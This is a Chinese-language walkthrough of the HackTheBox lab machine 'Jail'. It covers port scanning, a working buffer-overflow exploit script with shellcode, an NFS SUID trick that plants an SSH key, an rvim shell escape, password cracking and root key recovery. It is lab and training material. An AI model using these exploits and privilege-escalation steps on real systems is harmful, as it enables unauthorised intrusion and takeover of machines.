Jail - HackTheBox

基本信息

• https://www.hackthebox.eu/home/machines/profile/45

• 10.10.10.34

端口扫描

需要全端口：

➜  Jail nmap -p- 10.10.10.34
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-20 14:24 CST
Nmap scan report for 10.10.10.34
Host is up (0.51s latency).
Not shown: 65529 filtered ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
2049/tcp  open  nfs
7411/tcp  open  daqstream
20048/tcp open  mountd

Nmap done: 1 IP address (1 host up) scanned in 1624.97 seconds

80

nfs

nfs可以发现两个目录无限制：

$ showmount -e 10.10.10.34
Exports list on 10.10.10.34:
/opt                                *
/var/nfsshare                       *

目录扫描

目录扫描可以扫到jailuser，需要中等字典：

gobuster dir -u http://10.10.10.34/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50

/jailuser             (Status: 301) [Size: 236] [--> http://10.10.10.34/jailuser/]

里面是jail程序文件和源码：

jail

这个就是7411端口的服务，根据源码和程序调试可以发现bof，源码里debug模式可以得到userpass buffer，就是基础的bof：

# Leaked buffer address on remote
userpass buffer addr 0xffffd610
offset 28
# 0xffffd610 + offset + 4 bytes of junk
#buffer_offset = 0xffffd610 + 32
#buffer_offset = hex(buffer_offset)
#pint(buffer_offset)
#Calculated buffer = 0xffffd630

bof exploit

就是直接执行shellcode：

• https://www.exploit-db.com/exploits/34060

打到nobody shell：

exp.py

from pwn import *

shellcode = "\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6\x31\xc9\x56\x5b\x6a\x3f\x58\xcd\x80\x41\x80\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"

# payload = "A"*28 + p32(0xffffd630) + shellcode
payload = "A"*28 + "\x30\xd6\xff\xff" + shellcode


r = remote('10.10.10.34', 7411)
print(r.recv(1024))
r.sendline('USER admin')
print(r.recv(1024))
r.sendline('PASS ' + payload)
r.interactive()

frank 信息

当前nobody可以以frank身份运行/opt/logreader/logreader.sh，前面nfs看到有opt，所以下一步就是通过nfs打到frank：

NFS

mount后的目录需要uid1000的用户才能访问，因为frank的uid是1000:

nfsshare

实际用到的是nfsshare，用到的是nfs的配置错误导致suid继承，这样我们可以得到远程服务器上uid 1000的用户shell：

• https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe

sudo mount -t nfs 10.10.10.34:/var/nfsshare miao1 -o nolock
gcc shell.c -o shell -m32
cp ../shell .
chmod 4777 shell

shell.c

/*
gcc shell.c -o shell -m32
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
int main()
{
setuid(1000);
FILE *fptr;
fptr = fopen("/home/frank/.ssh/authorized_keys", "a");
fprintf(fptr, "ssh-rsa XXXXXX");
fclose(fptr);
return 0;
}

user flag

suid程序执行后，写入公钥到frank用户，ssh登录，得到user.txt:

adm 信息

rvim：

• https://gtfobins.github.io/gtfobins/rvim/#sudo

frank to adm

sudo -u adm /usr/bin/rvim /var/www/html/jailuser/dev/jail.c
# 进入命令模式
py import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")

提权信息

发现一个加密的keys.rar和密码提示信息：

另外更深层目录发现另一个提示信息：

根据解出来的这句话搜到这篇文章：

• https://www.bbc.com/news/world-us-canada-42826582

得到相关信息：

Frank Morris
1962
最后一位是符号

密码字典

根据这些信息可以生成密码字典：

crunch 11 11 -t Morris1962^  > password.txt

破解出rar密码，解压出一个公钥：

/usr/sbin/rar2john keys.rar > keys
sudo john --wordlist=./password.txt keys
Morris1962!
unrar e keys.rar
# 得到rootauthorizedsshkey.pub

私钥

根据公钥得到私钥：

• https://github.com/Ganapati/RsaCtfTool

python3 ~/Tools/RsaCtfTool/RsaCtfTool.py --publickey ./rootauthorizedsshkey.pub --private

root flag

ssh使用私钥登录，得到root.txt:

参考资料

• https://www.exploit-db.com/exploits/34060
• https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe
• https://gtfobins.github.io/gtfobins/rvim/#sudo
• https://www.quipqiup.com/
• https://www.bbc.com/news/world-us-canada-42826582
• https://en.wikipedia.org/wiki/June_1962_Alcatraz_escape_attempt#Frank_Morris
• https://github.com/Ganapati/RsaCtfTool
• https://thecybergeek.co.uk/walkthrough/hackthebox/2021/02/06/HackTheBox-Jail.html
• https://www.hackthebox.eu/home/machines/writeup/45
• HackTheBox - Jail - YouTube
  https://www.youtube.com/watch?v=80-73OYcrrk&ab_channel=IppSec